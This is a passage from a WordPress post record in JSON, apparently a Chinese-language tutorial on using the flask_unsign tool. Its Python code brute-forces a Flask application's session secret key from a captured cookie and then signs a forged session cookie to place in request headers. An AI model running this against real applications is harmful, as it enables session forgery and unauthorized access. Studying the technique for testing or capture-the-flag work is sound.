\u542f\u52a8\uff1a<\/p>\n
python -m pip install flask_unsign\npython -m pip install flask_unsign_wordlist<\/code><\/pre>\n\u7206\u7834cookie\u751f\u6210\u79c1\u94a5\uff1a<\/p>\n
from flask_unsign import Cracker, logger, DEFAULT_WORDLIST\nfrom flask_unsign.helpers import wordlist\n\ncookie = 'eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4'\n\ncrack = Cracker(value=cookie, threads=8) # \u4f7f\u7528\u9ed8\u8ba4 salt\uff0cthreads\u4e3a\u7ebf\u7a0b\u91cf\n\nwith wordlist(DEFAULT_WORDLIST) as iterator:\n crack.crack(iterator)\n\nif crack.secret:\n logger.success(f'Found secret key after {crack.attempts} attempts') #crack.attempts\u4e3a\u5c1d\u8bd5\u6b21\u6570\n secret_key = crack.secret.decode('utf-8', errors='ignore')\n print(\"SECRET_KEY:\", secret_key) \n\n\/\/wordlist(DEFAULT_WORDLIST)\u4e2dDEFAULT_WORDLIST\u53ef\u4ee5\u7528\u4efb\u610f\u5b57\u5178\u7684\u5b58\u50a8\u8def\u5f84\u4ee3\u66ff\n\/\/wordlist(DEFAULT_WORDLIST)\u6574\u4f53\u53ef\u4ee5\u7528\u4e00\u4e2a\u53ef\u8fed\u4ee3\u5bf9\u8c61\u4ee3\u66ff\uff0c\u5982\u4e00\u4e2a\u751f\u6210\u5668\n\/\/candidates = (str(i).encode() for i in range(1, 1000))\n\/\/crack.crack(candidates)\n\/\/\u5bc6\u94a5\u7206\u7834\u540e\u539f\u59cb\u4e3a\u5b57\u8282\uff0c\u9700\u8981\u89e3\u7801<\/code><\/pre>\n\u5229\u7528\u7206\u7834\u51fa\u6765\u7684\u79c1\u94a5\u751f\u6210\u65b0\u7684cookie<\/p>\n
from flask_unsign import session\nsec_session = session.sign(\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0value={\"username\": \"guest\"},\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0secret=secret_key,\n)\nprint(sec_session) \n#secret\u82e5\u65e0\u7279\u6b8a\u8981\u6c42\uff0c\u503c\u5e94\u4e3a\u7206\u7834cookie\u751f\u6210\u7684\u5bc6\u94a5\n#sec_session\u503c\u4e3acookie\u53ef\u6dfb\u52a0\u5165header\u5934\u90e8<\/code><\/pre>\n\u5b8c\u6574\u6d41\u7a0b\uff1a<\/p>\n
from flask_unsign import Cracker, logger, DEFAULT_WORDLIST\nfrom flask_unsign.helpers import wordlist\nfrom flask_unsign import session\n\ncookie = \"eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4\"\n\ncrack = Cracker(value=cookie, threads=8) # \u4f7f\u7528\u9ed8\u8ba4 salt\n\ninex = (str(i).encode() for i in range(233000, 234000))\n\ncrack.crack(inex)\n\nif crack.secret:\n logger.success(f\"Found secret key after {crack.attempts} attempts\")\n secret_key = crack.secret.decode(\"utf-8\", errors=\"ignore\")\n print(\"SECRET_KEY:\", secret_key)\n sec_session = session.sign(\n value={\"username\": \"guest\"},\n secret=secret_key,\n )\n print(sec_session)<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u7528flask_unsign\u7206\u7834cookie\u6216session \u542f\u52a8\uff1a python -m pip install […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-84","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/84","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=84"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/84\/revisions"}],"predecessor-version":[{"id":85,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/84\/revisions\/85"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=84"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=84"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=84"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}